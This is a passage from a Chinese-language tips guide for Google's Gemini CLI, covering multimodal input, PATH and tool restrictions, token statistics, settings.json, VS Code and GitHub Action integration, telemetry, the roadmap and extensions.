作为专业用户，你甚至可以安装额外的命令行工具来赋予 Gemini 更强大的能力。比如说，如果你安装了云服务的命令行工具（AWS CLI、GCloud CLI 等），理论上只要给出相应提示，Gemini 就能利用它们来管理云资源。当然，一定要确保你理解并信任执行的命令，特别是使用那些功能强大的工具时（你肯定不希望它意外启动庞大的云实例）。但只要使用得当，这个理念——一切皆可为 Gemini 工具——就是让它融入你的环境后能力呈指数级增长的关键所在。

技巧18：运用多模态功能 - 让 Gemini 识别图像等内容

快速使用场景： Gemini CLI 不仅限于文本处理，它还是多模态的。这意味着它可以分析图像、图表，甚至 PDF 文件（只要你提供）。充分利用这一点吧。比如说，你可以说：”这是一个错误对话框的截图， @./error.png - 帮我排查一下这个问题。”AI 就会”看见”这张图片并给出相应的回应。

Google Gemini 模型（以及其前身 PaLM2 的 Codey 形式）的突出特性之一就是图像理解能力。在 Gemini CLI 中，当你用 @ 引用图像时，模型会接收到图像数据。它可以输出描述、分类，或对图像内容进行推理。我们已经讨论过根据内容重命名图像（技巧 14）和描述截图（技巧 7）。但让我们看看其他一些有创意的用法：

UI/UX 反馈： 如果你是和设计师一起工作的开发者，你可以直接把UI设计图丢给Gemini，让它来反馈意见或者生成代码。比如，你可以说：”看看这个UI原型 @mockup.png ，然后为它生成一个React组件结构。”Gemini能够识别图中的各种元素（比如标题栏、按钮等），然后为你规划出相应的代码结构。
图片整理： 除了重命名，如果你有一堆杂乱的图片文件夹，想要按内容进行分类整理，可以说：”把 ./photos/ 文件夹里的图片按主题分类到子文件夹中（比如日落、山脉、人物等）。”AI会逐一查看每张照片并对其进行分类（这和很多相册App用AI自动整理图片的功能类似 - 现在你可以通过Gemini用自己的脚本来实现了）。
OCR 和数据提取： 如果你有错误信息的截图或者文档的照片，Gemini通常能从中读取文字。比如，”从 invoice.png 中提取文本并整理成结构化格式。”正如Google Cloud博客中的一个例子所示，Gemini CLI可以处理一组发票图片，并输出包含这些发票信息的表格。它基本上完成了OCR识别+内容理解，从发票图片中提取出发票号、日期、金额等信息。这是一个高级用例，但在底层多模态模型的支持下是完全可以实现的。
理解图形或图表： 如果你有图表截图，可以问：”解读下这张图的关键信息 @chart.png 。”它可能会帮你解读坐标轴和数据趋势。虽然准确性可能会有差异，但这是一个很值得尝试的便捷功能。

为了能实际应用：当您使用 @image.png 引用图片时，请确保图片不要过大（尽管模型能够处理尺寸合理的图片）。CLI工具会将图片进行编码并发送给模型处理。响应结果可能会包含图片描述或相关操作建议。您还可以在同一个提示中混合使用文本和图片引用。

非图像模态： CLI工具和模型还可以处理PDF和音频文件，通过内部工具进行转换。例如，当您引用 @report.pdf 时，Gemini CLI会在后台使用PDF转文本工具来提取内容并生成摘要。如果您引用 @audio.mp3 并要求转录，它可能会调用音频转文本工具（如语音识别功能）。速查表显示支持引用PDF、音频和视频文件，这应该是通过调用相应的内部工具或API来实现的。因此，像”转录这段访谈音频： @interview.wav “这样的命令实际上是可行的（即使现在不行，很可能很快就会支持，因为底层的Google语音转文本API可以集成进来）。

丰富输出格式：多模态也意味着AI可以在响应中返回图像内容（如果进行了相关集成）。不过在CLI环境中，通常不会直接显示图像，但可能会保存图片文件或输出ASCII艺术等形式。之前提到的MCP功能表明，工具能够返回图像数据。例如，AI绘图工具可以生成图像，然后Gemini CLI可以通过打开文件或提供链接的方式来呈现这张图片。

重要提示： CLI工具本身是基于文本的，所以您无法在终端中直接看到图像（除非支持ASCII预览功能）。您只会获得对图像的分析结果。因此，这主要是为了读取图像内容，而不是显示图像。如果您使用的是VS Code集成环境，那么图片可能会在聊天视图中显示出来。

总而言之，使用Gemini CLI时不要忘记GUI中的”I”（Interface） - 在很多情况下，它能很好地处理图像信息，就像处理文本一样轻松。这开启了许多工作流程，比如可视化调试、设计辅助、从截图中提取数据等，所有这些都可以在同一个工具中完成。这是其他一些CLI工具目前可能不具备的差异化优势。随着模型的不断改进，这种多模态支持将变得更加强大，因此掌握这项技能是一项面向未来的能力。

技巧19：自定义 `$PATH`（和工具可用性）以获得稳定性

快速使用场景： 如果您发现Gemini CLI出现混乱或调用了错误的程序，可以考虑使用定制的 $PATH 环境变量来运行它。通过限制或排序可执行文件的访问顺序，您可以防止AI调用到意料之外的同名脚本。从本质上说，您就是将其工具访问限制在一个可信的沙盒环境中，只允许使用已知安全的工具。

对大多数用户来说，这并不是什么问题，但对于拥有大量自定义脚本或多个工具版本的专业用户来说，这可能会很有帮助。开发者提到的一个原因是避免无限循环或奇怪的行为。例如，如果 gemini 命令本身就在 $PATH 中，失控的AI可能会在Gemini内部递归调用 gemini （虽然这是个奇怪的场景，但理论上是有可能的）。又或者您有一个名为 test 的命令与其他工具产生了冲突——AI可能会调用到错误的那个命令。

如何为 Gemini 设置 PATH： 最简单的方法是在启动时直接设置：

1	PATH=/usr/bin:/usr/local/bin gemini

这样运行Gemini CLI时，使用的 $PATH 就只限于指定的目录。您可以排除那些存放实验性或危险脚本的目录。另外，您也可以创建一个小的shell脚本包装器，先清理或调整 $PATH ，然后再执行 gemini 。

另一种方法是使用环境变量或配置来明确禁用某些工具。例如，如果您绝对不希望AI使用 rm 或某些破坏性工具，理论上可以在安全的 $PATH 中创建一个别名或空的 rm 命令（但这可能会干扰正常操作，所以不太推荐）。更好的方法是在设置中使用排除列表。在扩展或 settings.json 中，您可以排除特定的工具名称。例如：

1	"excludeTools": ["run_shell_command"]

这个极端的例子会阻止所有shell命令的执行（使Gemini变为只读模式）。更细粒度的控制方式是跳过某些命令的确认提示；同样地，您也可以进行类似这样的配置：

1
2
3

"tools": {
  "exclude": ["apt-get", "shutdown"]
}

（此语法是说明性的；确切用法请参阅文档。）

其原理是，通过控制环境来降低AI使用不当工具造成失误的风险。这就类似于给家里做儿童安全防护。

防止无限循环： 有个用户遇到过Gemini不断读取自己的输出或重复读取文件的无限循环情况。自定义 $PATH 无法直接修复逻辑循环，但其中一个原因可能是AI调用了某个命令而触发了自身调用。确保它不会意外启动另一个AI实例（比如AI决定调用 bard 或 gemini 命令）是很重要的做法。将那些命令从 $PATH 中移除（或者在当前会话中重命名它们）就能帮助避免这种情况。

通过沙箱隔离： 除了修改 $PATH 之外，另一个选择是使用 –sandbox 模式（它会通过Docker或Podman在隔离环境中运行工具）。在这种情况下，AI的所有操作都被限制在容器内，只能使用沙盒镜像中提供的工具。您可以提供一个经过精心挑选的Docker镜像，里面包含特定的工具集。这种方法虽然比较重量级，但安全性非常高。

为特定任务自定义 PATH：你可以为不同项目设置不同的 $PATH 配置。例如，在一个项目中，你希望使用特定版本的 Node.js 或本地工具链。使用指向这些版本的 $PATH 来启动 gemini ，就能确保 AI 使用正确的版本。本质上，要把 Gemini CLI 当作普通用户看待——它使用你提供的任何环境。因此，如果你需要它选择 gcc-10 而不是 gcc-12 ，相应地调整 $PATH 或 CC 环境变量即可。

总结来说：给Gemini CLI设置防护栏。作为高级用户，你能够微调 AI 的运行环境。如果你发现某种不良行为模式与工具使用相关，调整 $PATH 就是快速解决方案。日常使用中你可能不需要这样做，但这是一个专业技巧，值得在将 Gemini CLI 集成到自动化或 CI 环境时记住：给它一个受控的环境。这样你就能确切知道它能做什么和不能做什么，从而提高可靠性。

技巧 20：通过令牌缓存和统计来跟踪和降低令牌消耗

如果你运行长对话或重复附加相同的大文件，可以通过启用令牌缓存和监控使用情况来降低成本和延迟。使用 API 密钥或 Vertex AI 认证时，Gemini CLI 会自动重用之前发送的系统指令和上下文，让后续请求更便宜。你可以在 CLI 中实时看到节省的效果。

如何使用

选择启用缓存的认证模式。使用 Gemini API 密钥或 Vertex AI 认证时可使用令牌缓存功能。目前 OAuth 登录暂不支持此功能。参见文档:Google Gemini

检查你的使用情况和缓存命中率。在会话期间运行 stats 命令。它会显示总令牌数，以及在缓存激活时的 cached 字段。

/stats

命令的描述和缓存报告行为在命令参考和 FAQ 中有文档说明

在脚本中捕获指标。无头运行时，输出 JSON 并解析 stats 块，其中包含每个模型的 tokens.cached:

1	gemini -p "Summarize README" --output-format json

无头指南记录了包含缓存令牌计数的 JSON 架构: https://google-gemini.github.io/gemini-cli/docs/cli/headless.html

将会话摘要保存到文件：对于 CI 或预算跟踪，将 JSON 会话摘要写入磁盘。

1	gemini -p "Analyze logs" --session-summary usage.json

使用 API 密钥或 Vertex 身份验证时，CLI 会自动重用之前发送的上下文，这样后续对话就能发送更少的令牌。保持 GEMINI.md 和大文件引用在多次对话中的稳定性可以提高缓存命中率；你会在统计信息中看到这一效果反映为缓存的令牌。

技巧21: 使用 /copy 命令快速复制到剪贴板

快速使用场景：立即将 Gemini CLI 中的最新答案或代码片段复制到系统剪贴板，不含任何多余格式或行号。这非常适合将 AI 生成的代码快速粘贴到编辑器中，或与团队成员分享结果。

当 Gemini CLI 提供答案时（特别是多行代码块），你通常想在别处重用它。 /copy 斜杠命令让这一操作变得轻而易举——它直接将 CLI 最后产生的输出复制到剪贴板。与手动选择（可能会抓取行号或提示文本）不同， /copy 只获取原始响应内容。例如，如果 Gemini 刚刚生成了一个 50 行的 Python 脚本，只需输入 /copy 就会将整个脚本放入剪贴板，随时可以粘贴——无需滚动和选择文本。在底层，Gemini CLI 会使用适合你平台的剪贴板工具（例如 macOS 上的 pbcopy 、Windows 上的 clip ）。运行命令后，你通常会看到确认消息，然后就可以将复制的文本粘贴到任何需要的地方。
工作原理： /copy 命令要求你的系统有可用的剪贴板工具。在 macOS 和 Windows 上，所需的工具（分别为 pbcopy 和 clip ）通常预装。在 Linux 上，你可能需要安装 xclip 或 xsel 才能让 /copy 正常工作。确保后，你可以在 Gemini CLI 输出答案后的任何时候使用 /copy 。它会捕获整个最后的响应（即使很长）并省略 CLI 可能在屏幕上显示的任何内部编号或格式。这为你省去了传输内容时处理不必要杂质的麻烦。虽然这只是个小功能，但当你迭代代码或整理 AI 生成的报告时，能为你节省大量时间。
提示：如果你发现 /copy 命令不工作，请检查剪贴板工具是否已安装并可访问。例如，Ubuntu 用户应该运行 sudo apt install xclip 来启用剪贴板复制功能。设置完成后， /copy 让你能零阻力地分享 Gemini

技巧 22：掌握 Ctrl+C 用于 Shell 模式和退出

快速使用场景：通过按键干净利落地中断 Gemini CLI 或退出 shell 模式——快速双击可完全退出 CLI——这都归功于万能的 Ctrl+C

Gemini CLI 的操作类似于 REPL，了解如何中断操作至关重要。按一次 Ctrl+C 会取消当前操作或清除你已开始输入的任何内容，本质上充当”中止”命令。例如，如果 AI 正在生成冗长的答案而你已经看够了，按下 Ctrl+C ——生成会立即停止。如果你已开始输入提示但想放弃， Ctrl+C 会清除输入行，让你可以重新开始。此外，如果你处于 shell 模式（通过输入 ! 激活以运行 shell 命令），单次 Ctrl+C 将退出 shell 模式并返回到正常的 Gemini 提示符（它会向正在运行的 shell 进程发送中断信号）。如果 shell 命令卡住了或者你只是想回到 AI 模式，这极其方便。
连续按两次 Ctrl+C 是完全退出 Gemini CLI 的快捷键。可以这样理解：”按一次 Ctrl+C 取消，再按一次 Ctrl+C 退出。” 这种双击操作会向 CLI 发出终止会话的信号（你会看到告别消息或程序关闭）。这比输入 /quit 或关闭终端窗口更快，让你能通过键盘优雅地关闭 CLI。请注意，如果有输入需要清除或有操作需要中断，单次 Ctrl+C 不会退出——它需要第二次按键（在提示符空闲时）才能完全退出。这种设计可以防止在你只想停止当前输出时意外关闭会话。

提示：在 shell 模式下，你也可以按 Esc 键离开 shell 模式并返回到 Gemini 的聊天模式，而无需终止 CLI。如果你更喜欢正式的退出方式， /quit 命令始终可用，可以干净地结束会话。此外，Unix 用户可以在空提示符下使用 Ctrl+D（EOF）退出——如果需要，Gemini CLI 会提示确认。但对于大多数情况，掌握 Ctrl+C 的单击和双击是保持控制的最快方式。

技巧 23：使用 settings.json 自定义 Gemini CLI

快速使用场景：通过编辑 settings.json 配置文件来调整 CLI 的行为和外观，以符合你的偏好或项目约定，而不是固守一刀切的默认设置。这让你能够在所有会话中强制执行主题、工具使用规则或编辑器模式等设置。

Gemini CLI 是高度可配置的。在用户主目录（ ~/.gemini/ ）或项目文件夹（仓库内的 .gemini/ ）中，你可以创建 settings.json 文件来覆盖默认设置。几乎 CLI 的每个方面都可以在这里调整——从视觉主题到工具权限。CLI 会合并多个级别的设置：系统范围的默认设置、用户设置和项目特定设置（项目设置会覆盖用户设置）。例如，你可能有一个全局的深色主题偏好，但某个特定项目可能需要更严格的工具沙盒限制；你可以通过在不同级别的 settings.json 文件来处理这种情况。

在 settings.json 内部，选项以 JSON 键值对的形式指定。以下是一个展示一些有用自定义配置的代码片段:

{
"theme": "GitHub",
"autoAccept": false,
"vimMode": true,
"sandbox": "docker",
"includeDirectories": ["../shared-library", "~/common-utils"],
"usageStatisticsEnabled": true
}

在这个例子中，我们将主题设置为 “GitHub”（一种流行的配色方案），禁用 autoAccept （这样 CLI 在运行可能有潜在影响的工具前总是会询问），启用输入编辑器的 Vim 键绑定，并强制使用 Docker 进行工具沙盒化。我们还在工作区上下文中添加了一些目录（ includeDirectories ），这样 Gemini 默认就能看到共享路径中的代码。最后，我们将 usageStatisticsEnabled 保持为 true 来收集基本使用统计（如果启用了遥测，这会提供数据支持）。还有更多可用设置——比如定义自定义颜色主题、调整令牌限制，或列入白名单/黑名单特定工具——所有这些都记录在配置指南中。通过调整这些设置，你可以确保 Gemini CLI 为你的工作流程表现最佳（例如，一些开发者为了效率总是希望开启 vimMode ，而其他人可能更喜欢默认编辑器）。

编辑设置的一个便捷方式是通过内置的设置 UI。在 Gemini CLI 中运行命令 /settings，它会为你的配置打开一个交互式编辑器。这个界面让你可以浏览和搜索带描述的设置，并通过验证输入来防止 JSON 语法错误。你可以通过友好的菜单调整颜色、切换 yolo（自动批准）等功能、调整检查点（文件保存/恢复行为）等。更改会保存到你的 settings.json，有些更改会立即生效（其他可能需要重启 CLI）。

提示： 为不同需求维护单独的项目特定 settings.json 文件。例如，在团队项目中你可能设置 "sandbox": "docker" 和 "excludeTools": ["run_shell_command"] 来锁定危险操作，而个人项目可能允许直接 shell 命令。Gemini CLI 会自动在项目目录树中找到最近的 .gemini/settings.json 并将其与你的全局 ~/.gemini/settings.json 合并。另外，别忘了你可以快速调整视觉偏好：尝试使用 /theme 交互式切换主题而无需编辑文件，这对于找到舒适的外观很棒。一旦找到喜欢的主题，就把它放入 settings.json 使其永久生效。

技巧 24：利用 IDE 集成（VS Code）获取上下文和差异比较

快速使用场景： 通过将 Gemini CLI 链接到 VS Code 来增强其功能——CLI 会自动知道你正在处理哪些文件，甚至会在 VS Code 的差异编辑器中为你打开 AI 提供的代码更改。这在 AI 助手和你的编码工作空间之间创建了无缝循环。

Gemini CLI 的强大功能之一是它与 Visual Studio Code 的 IDE 集成。通过在 VS Code 中安装官方的 Gemini CLI Companion 扩展并连接它，你允许 Gemini CLI 对你的编辑器变得”上下文感知”。这在实践中意味着什么？当连接时，Gemini 知道你打开的文件、当前光标位置，以及你在 VS Code 中选择的任何文本。所有这些信息都会输入到 AI 的上下文中。所以如果你问”解释这个函数”，Gemini CLI 可以看到你高亮的确切函数并给出相关答案，而无需你将代码复制粘贴到提示中。该集成共享最多你最近打开的 10 个文件，加上选择和光标信息，让模型对你的工作空间有丰富的理解。

另一个巨大优势是代码更改的原生差异比较。当 Gemini CLI 建议修改你的代码时（例如，”重构这个函数”并生成补丁），它可以自动在 VS Code 的差异查看器中打开这些更改。你会在 VS Code 中看到并排的差异视图，显示建议的编辑。然后你可以使用 VS Code 熟悉的界面来检查更改、进行任何手动调整，甚至通过单击接受补丁。CLI 和编辑器保持同步——如果你在 VS Code 中接受差异，Gemini CLI 会知道并在应用这些更改后继续会话。这个紧密循环意味着你不再需要将代码从终端复制到编辑器；AI 的建议直接流入你的开发环境。

如何设置： 如果你在 VS Code 的集成终端中启动 Gemini CLI，它会检测到 VS Code 并通常会提示你自动安装/连接扩展。如果你同意，它将运行必要的 /ide install 步骤。如果你没有看到提示（或稍后启用），只需打开 Gemini CLI 并运行命令：/ide install。这将为你获取并安装”Gemini CLI Companion”扩展到 VS Code 中。接下来，运行 /ide enable 建立连接——CLI 然后会指示它已链接到 VS Code。你可以随时使用 /ide status 验证，它会显示是否已连接并列出正在跟踪的编辑器和文件。从那时起，Gemini CLI 将自动从 VS Code 接收上下文（打开的文件、选择），并在需要时在 VS Code 中打开差异。它本质上将 Gemini CLI 变成一个存在于你的终端中但完全了解你的 IDE 的 AI 结对程序员。

目前，VS Code 是此集成的主要支持编辑器。（其他支持 VS Code 扩展的编辑器，如 VSCodium 或通过插件的一些 JetBrains，可能通过相同的扩展工作，但目前官方支持的是 VS Code。）不过设计是开放的——有 IDE Companion 规范用于与其他编辑器开发类似的集成。所以未来我们可能会看到对像 IntelliJ 或 Vim 等 IDE 的一流支持，通过社区扩展实现。

提示： 连接后，你可以使用 VS Code 的命令面板来控制 Gemini CLI 而无需离开编辑器。例如，按 Ctrl+Shift+P（Mac 上为 Cmd+Shift+P）并尝试像 “Gemini CLI: Run”（在终端中启动新的 CLI 会话）、“Gemini CLI: Accept Diff”（批准并应用打开的差异）或 “Gemini CLI: Close Diff Editor”（拒绝更改）等命令。这些快捷键可以进一步简化你的工作流程。而且记住，你不必总是手动启动 CLI——如果你启用了集成，Gemini CLI 本质上就成为了 VS Code 内部的 AI 协同开发者，观察上下文并在你处理代码时随时准备提供帮助。

技巧 25：使用 `Gemini CLI GitHub Action` 自动化仓库任务

快速应用场景： 让 Gemini 在 GitHub 上发挥作用 - 使用 Gemini CLI GitHub Action 来自动分类新 issue 和审查仓库中的拉取请求，就像一个 AI 团队成员一样处理日常开发任务。

Gemini CLI 不仅仅适用于交互式终端会话；它还可以通过 GitHub Actions 在 CI/CD 流水线中运行。Google 提供了一个现成的 Gemini CLI GitHub Action（目前处于测试阶段），可以集成到您仓库的工作流中。这实际上是在 GitHub 上的项目中部署了一个 AI 代理。它在后台运行，由仓库事件触发。

例如，当有人提交一个新的 issue 时，Gemini Action 会自动分析 issue 描述，应用相关标签，甚至确定其优先级或建议可能的重复项（这就是”智能 issue 分类”工作流）。当开启 pull request 时，Action 会启动并提供 AI 代码审查 - 它会在 PR 上评论，提供关于代码质量、潜在错误或风格改进的见解。这让维护者在任何人工查看之前就能获得对 PR 的即时反馈。

或许最酷的功能是 on-demand collaboration(按需协作)：团队成员可以在 issue 或 PR 评论中提及 @gemini-cli 并给出指令，比如”@gemini-cli 请为此编写单元测试”。Action 会接收到这个信息，Gemini CLI 会尝试完成请求（例如，通过添加包含新测试的提交）。这就像在您的仓库中有一个 AI 助手，随时准备在需要时处理杂务。

设置 Gemini CLI GitHub Action 非常简单。首先，确保您在本地安装了 0.1.18 或更高版本的 Gemini CLI（这确保了与 Action的兼容性）。然后，在 Gemini CLI 中运行特殊命令：/setup-github。这个命令会在您的仓库中生成必要的工作流文件（如果需要，它会引导您完成身份验证）。具体来说，它会在 .github/workflows/ 目录下添加 YAML 工作流文件（用于 issue 分类、PR 审查等）。

您需要将 Gemini API 密钥添加到仓库的机密信息中（作为 GEMINI_API_KEY），这样 Action 就可以使用 Gemini API。一旦完成并提交了工作流，GitHub Action 就会启动 - 从那一刻起，Gemini CLI 将根据这些工作流自主响应新的 issue 和 PR。

由于这个 Action 本质上是以自动化方式运行 Gemini CLI，您可以像自定义 CLI 一样自定义它。默认设置包含三个工作流（issue 分类、PR 审查和通用的提及触发助手），这些工作流是完全开源且可编辑的。您可以调整 YAML 来修改 AI 的行为，甚至添加新的工作流。

例如，您可以创建一个夜间工作流，使用 Gemini CLI 扫描仓库中的过期依赖项，或基于最近的代码更改更新 README - 可能性是无穷的。这里的关键好处是将繁琐或耗时的任务交给 AI 代理处理，让人类开发者可以专注于更困难的问题。而且由于它在 GitHub 的基础设施上运行，不需要您的干预 - 它真正是一个”设置即忘记”的 AI 助手。

提示： 关注 GitHub Actions 日志中 Action 的输出以保持透明度。Gemini CLI Action 日志会显示它运行了什么提示以及做出了或建议了什么更改。这既能建立信任，也能帮助您优化其行为。此外，团队还在 Action 中内置了企业级安全保障 - 例如，您可以要求 AI 在工作流中尝试运行的所有 shell 命令都必须经过您的允许列表批准。所以即使在严肃的项目中也不要犹豫使用它。

如果您使用 Gemini CLI 想出了一个很酷的自定义工作流，考虑将其贡献回社区 - 项目欢迎在他们的仓库中提出新想法！

技巧 26：启用Telemetry以获得指标和可观测性

快速应用场景： 通过启用内置的 OpenTelemetry 仪表化来深入了解 Gemini CLI 的使用情况和性能表现 - 监控 AI 会话的指标、日志和追踪，分析使用模式或排除问题。

对于喜欢测量和优化的开发者来说，Gemini CLI 提供了一个可观测性功能，可以揭示内部发生的情况。通过利用 OpenTelemetry (OTEL)，Gemini CLI 可以上报关于您会话的结构化遥测数据。这包括指标（如使用的令牌数量、响应延迟）、所采取操作的日志，甚至工具调用的追踪。

启用遥测后，您可以回答诸如：我最常使用哪个自定义命令？本周 AI 在这个项目中编辑文件的次数是多少？当我要求 CLI 运行测试时的平均响应时间是多少？这类数据对于理解使用模式和性能至关重要。团队可以用它来查看开发者如何与 AI 助手交互，以及可能存在的瓶颈在哪里。

默认情况下，遥测是关闭的（Gemini 尊重隐私和性能）。您可以通过在 settings.json 中设置 "telemetry.enabled": true 或使用标志 --telemetry 启动 Gemini CLI 来选择启用。此外，您可以选择遥测数据的目标：可以在本地记录或发送到像 Google Cloud 这样的后端。

为了快速开始，您可以设置 "telemetry.target": "local" - 这样，Gemini 会简单地将遥测数据写入本地文件（默认情况下）或您通过 ["outfile"](https://google-gemini.github.io/gemini-cli/docs/cli/telemetry.html#:~:text:disable%20telemetry%20,file%20path) 指定的自定义路径。本地遥测包括您可以解析或输入到工具中的 JSON 日志。

为了更强大的监控，设置 "target": "gcp"（Google Cloud）或甚至与其他 OpenTelemetry 兼容的系统（如 Jaeger 或 Datadog）集成。事实上，Gemini CLI 的 OTEL 支持是厂商中立的 - 您可以将数据导出到您偏好的几乎任何可观测性堆栈（Google Cloud Operations、Prometheus、等等）。

Google 为 Cloud 提供了简化的路径：如果您指向 GCP，CLI 可以直接将数据发送到您项目中的 Cloud Logging 和 Cloud Monitoring，在那里您可以使用通常的仪表板和警报工具。

您能获得什么样的洞察？遥测捕获诸如工具执行、错误和重要里程碑等事件。它还记录指标，如提示处理时间和每个提示的令牌计数。

对于使用分析，您可以聚合团队中每个斜杠命令的使用次数，或代码生成被调用的频率。对于性能监控，您可以跟踪响应是否变慢，这可能表明达到 API 速率限制或模型更改。对于调试，您可以看到工具抛出的错误或异常（例如，run_shell_command 失败）随上下文一起记录。

如果将这些数据发送到像 Google Cloud Monitoring 这样的平台，所有这些数据都可以可视化 - 例如，您可以创建”每天使用的令牌数”或”工具 X 的错误率”的仪表板。它本质上为您提供了窥视 AI “大脑”和您使用情况的窗口，这在企业环境中特别有帮助，以确保一切运行顺畅。启用遥测确实会带来一些开销（额外的数据处理），所以个人使用时可能不会一直保持开启状态。然而，它对于调试会话或间歇性健康检查非常有用。一种方法是在 CI 服务器或团队的共享环境中启用它来收集统计信息，而在本地则保持关闭状态，除非需要。请记住，您可以随时动态切换：更新设置，如果需要可以使用 /memory refresh 重新加载，或使用 --telemetry 标志重启 Gemini CLI。此外，所有遥测都在您的控制之下 - 它尊重您为端点和凭据设置的环境变量，因此数据只会到达您想要的地方。这个功能将 Gemini CLI 从黑盒变成了天文台，照亮了 AI 代理如何与您的世界互动，这样您就可以持续改进这种互动。

提示： 如果您只是想快速查看当前会话的统计信息（而不需要完整的遥测），使用 /stats 命令。它会在 CLI 中直接输出令牌使用量和会话长度等指标。这是查看即时数据的轻量级方法。但对于长期或多会话分析，遥测是正确的选择。如果您将遥测发送到云项目，考虑设置仪表板或警报（例如，如果错误率激增或令牌使用量达到阈值则警报） - 这可以主动捕获 Gemini CLI 在您团队中使用时出现的问题。

技巧 27：关注路线图（后台代理等）

快速使用场景： 及时了解即将推出的 Gemini CLI 功能——通过关注公共的 Gemini CLI 路线图，你可以在主要计划的增强功能（如用于长时间运行任务的后台代理）到达之前就了解它们，让你能够进行规划并提供反馈。

Gemini CLI 正在快速发展，新版本频繁发布，因此关注其未来规划是明智的选择。Google 在 GitHub 上维护着 Gemini CLI 的公开路线图，详细说明了近期重点关注的领域和目标功能。这基本上是一份活文档（以及相关 issue 集合），你可以从中看到开发者的工作重点和即将推出的功能。例如，路线图中一个令人期待的项目是后台代理支持——即能够生成在后台运行的自主代理，持续处理任务或异步执行工作。根据路线图讨论，这些后台代理将让你把长时间运行的任务委托给 Gemini CLI，而不会占用你的交互会话。比如，你可以启动一个后台代理来监控项目的特定事件，或者定期执行任务，无论是在本地机器上还是通过部署到 Cloud Run 等服务来实现。该功能旨在直接从 CLI”启用长时间运行的自主任务和主动辅助”，实质上是将 Gemini CLI 的实用性扩展到即时查询之外的场景。

通过关注路线图，你还能了解到其他规划中的功能。这些可能包括新的工具集成、对其他 Gemini 模型版本的支持、UI/UX 改进等等。路线图通常按”领域”组织（例如扩展性、模型、后台等），并经常标注里程碑（如目标交付季度）。这并不能保证某功能的具体发布时间，但能让你很好地了解团队的优先事项。

由于该项目是开源的，你甚至可以深入查看每个路线图项目链接的 GitHub issue，了解设计提案和进展。对于依赖 Gemini CLI 的开发者来说，这种透明度意味着你可以预见变化——也许是某个 API 正在添加你需要的功能，或者即将有破坏性变更，让你能够提前做好准备。

关注路线图很简单，收藏 GitHub 项目看板或标记为”路线图”的 issue，并定期查看。一些重大更新（如扩展功能或 IDE 集成的引入）在正式发布前都在路线图中有所暗示，所以你能提前一窥究竟。此外，Gemini CLI 团队经常鼓励社区对这些未来功能提供反馈。如果你对后台代理等功能有想法或使用案例，通常可以在相关的 issue 或讨论线程中留言，从而影响其开发方向。

提示：由于 Gemini CLI 是开源项目（采用 Apache 2.0 许可证），你不仅可以关注路线图，还可以参与其中！维护者欢迎贡献，特别是与路线图一致的项目。如果你真的关心某个功能，可以考虑在预览阶段贡献代码或进行测试。如果你需要的功能尚未出现在路线图中，你可以提出功能请求。路线图页面本身就提供了如何提议变更的指导。参与项目不仅让你保持信息同步，还能让你塑造自己使用的工具。毕竟，Gemini CLI 在设计时就考虑了社区参与，许多最近的功能（如某些扩展和工具）都起源于社区建议。

技巧 28：使用插件增强 Gemini CLI

快速用例：通过安装即插即用的插件为 Gemini CLI 添加新功能——例如集成你喜爱的数据库或云服务——无需费心就能扩展 AI 的工具集。这就像为你的 CLI 安装应用程序，教它掌握新技能。

插件是 2025 年底推出的革命性功能：它们让你能够以模块化方式自定义和扩展 Gemini CLI 的功能。插件本质上是一个配置包（可选包含代码），将 Gemini CLI 连接到外部工具或服务。例如，Google 发布了一套 Google Cloud 插件——有帮助部署应用到 Cloud Run 的，有管理 BigQuery 的，有分析应用安全的，还有更多。合作伙伴和社区开发者也为各种用途构建了插件：Dynatrace（监控）、Elastic（搜索分析）、Figma（设计资源）、Shopify、Snyk（安全扫描）、Stripe（支付）等等，而且这个名单还在不断增长。通过安装合适的插件，你立即赋予 Gemini CLI 使用新的领域特定工具的能力。其美妙之处在于，这些插件带有预定义的“操作手册”，教会 AI 如何有效使用这些新工具。这意味着一旦安装，你就可以让 Gemini CLI 执行与这些服务相关的任务，它会知道调用合适的 API 或命令，就像内置了这些知识一样。

使用插件非常简单。CLI 有专门的命令来管理它们：gemini extensions install 。通常，你提供插件的 GitHub 仓库 URL 或本地路径，CLI 就会获取并安装它。例如，要安装官方插件，你可能运行：gemini extensions install https://github.com/google-gemini/gemini-cli-extension-cloud-run。几秒钟内，插件就会添加到你的环境中（存储在 ~/.gemini/extensions/ 或你项目的 .gemini/extensions/ 文件夹下）。然后你可以通过在 CLI 中运行 /extensions 查看它，该命令会列出活跃的插件。从那时起，AI 就有了新的工具可用。如果是一个 Cloud Run 插件，你可以说”将我的应用部署到 Cloud Run”，Gemini CLI 实际上就能执行这个操作（通过插件的工具调用底层的 gcloud 命令）。本质上，插件作为 Gemini CLI 功能的一级扩展存在，但你只需要选择安装需要的那些。

围绕插件有一个开放的生态系统。Google 有一个官方插件页面列出了可用的插件，而且由于框架是开放的，任何人都可以创建和分享自己的插件。如果你有特定的内部 API 或工作流，可以为其构建插件，让 Gemini CLI 能够协助处理。编写插件比听起来更容易：通常你创建一个目录（比如 my-extension/），在其中创建 gemini-extension.json 文件，描述要添加的工具或上下文。你可以定义新的斜杠命令或指定 AI 可以调用的远程 API。无需修改 Gemini CLI 的核心——只需放入你的插件即可。CLI 被设计为在运行时加载这些插件。许多插件通过添加自定义 MCP 工具（模型上下文协议服务器或函数）来实现，AI 可以使用这些工具。例如，插件可以通过接入外部翻译 API 来添加 /translate 命令；一旦安装，AI 就知道如何使用 /translate。关键优势是模块化：你只安装需要的插件，保持 CLI 轻量，但可以选择集成几乎任何东西。

要管理插件，除了 install 命令外，你还可以通过类似的 CLI 命令更新或移除它们（gemini extensions update 或直接删除文件夹）。明智的做法是定期检查你使用的插件是否有更新，因为它们可能获得了改进。CLI 未来可能会引入”插件市场”风格的界面，但目前，探索 GitHub 仓库和官方目录是发现新插件的方式。发布时一些热门插件包括 GenAI Genkit 插件（用于构建生成式 AI 应用），以及各种 Google Cloud 插件，涵盖 CI/CD、数据库管理等领域。

提示：如果你要构建自己的插件，先从现有的插件中寻找示例。官方文档提供了插件指南，其中包含架构和功能说明。创建私有插件的一个简单方法是使用 GEMINI.md 中的 @include 功能注入脚本或上下文，但完整的插件给你更多能力（如打包工具）。此外，由于插件可以包含上下文文件，你可以用它们预加载领域知识。想象一个为你公司内部 API 创建的插件，包含 API 摘要和调用工具——AI 就会知道如何处理与该 API 相关的请求。简而言之，插件开启了一个新世界，Gemini CLI 可以与任何东西交互。关注插件市场的新增内容，不要犹豫与你创建的有用插件分享给社区——你可能帮助到成千上万的其他开发者。

附加：柯基模式彩蛋 🐕

